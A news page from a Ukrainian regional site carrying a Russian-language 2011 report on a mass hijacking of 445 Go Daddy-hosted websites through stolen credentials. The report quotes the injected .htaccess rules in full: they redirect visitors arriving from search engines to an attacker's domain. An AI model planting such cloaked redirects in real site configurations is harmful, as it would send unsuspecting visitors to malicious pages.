Житомир-Експрес
регіональний сайт новин

П'ятниця, 15 листопада 00:19
Анонси
В епіцентрі
Начальник ГУНП Житомирщини Сергій Крупєй: Довіра формується щоденною сумлінною та відповідальною роботою
Начальник ГУНП Житомирщини Сергій Крупєй: Довіра формується щоденною сумлінною та відповідальною роботою
Начальник ГУНП Житомирщини Сергій Крупєй: Довіра формується щоденною сумлінною та відповідальною роботоюВіталій Бунечко представив першого заступника голови ОДА – Володимира ФедоренкаГромадськості презентовано проєкт змін до Конституції щодо адмінтерустрою та місцевого самоврядуванняВіталій Бунечко призначив керівника апарату Житомирської ОДА
Загрузка...
Загрузка...

Программа телепередач на TVgid.ua.
Все последние новостиУкраины на ukr.net.
Автопродажа Renault для автолюбителей Украины.
http://job.ukr.net/ - вакансии со всей Украины.

Світ
21 сентября 2011, 08:37

Пользователи Go Daddy пострадали от массового взлома

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал
Массовая атака на 445 сайтов заключалась в внедрении вредоносного редиректа в файлы .htaccess. Go Daddy быстро устранили враждебный код, чтобы обезопасить своих потребителей и восстановить полный контроль над зараженными сайтами.

Директор по информационной безопасности компании Go Daddy, Тод Редфут, рассказал домену Wire: "Аккаунты были взломаны при помощи паролей и логинов пользователей".

Пока неясно как были получены пароли, необходимые для осуществления атаки, однако, скорее всего, объяснением может послужить целевая фишинговая атака. Go Daddy продолжают расследование, но Редфут предполагает, что корень массовой атаки нужно искать за пределами контроля Go Daddy.

"Инфраструктура не была нарушена, поэтому наши клиенты не должны пострадать", - заявляет он.

Фирма, занимающаяся веб-безопасностью, Securi, предупредила о массовой атаке в четверг. В записи в блоге, посвященной атаке, они говорят о том, что вредоносный код был скорее направлен против пользователей, которые заходили на пораженные домены через Google или другие поисковики, чем против тех покупателей, которые выходили на сайт напрямую. Такой вид мошенничества часто является неотъемлемой частью манипуляционных атак на поисковики, разработанных с целью переадресации пользователей, находящихся в поиске определенного контента:.

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

Подобный тип мошенничества часто основывается на неправильной установке WordPress и схожих систем. Таким образом, бесцеремонная кража паролей в данном случае является подтверждением того факта, что злоумышленники становятся все более и более агрессивными в своей охоте за потенциальными жертвами.

xakep.ru
Погода, Новости, загрузка...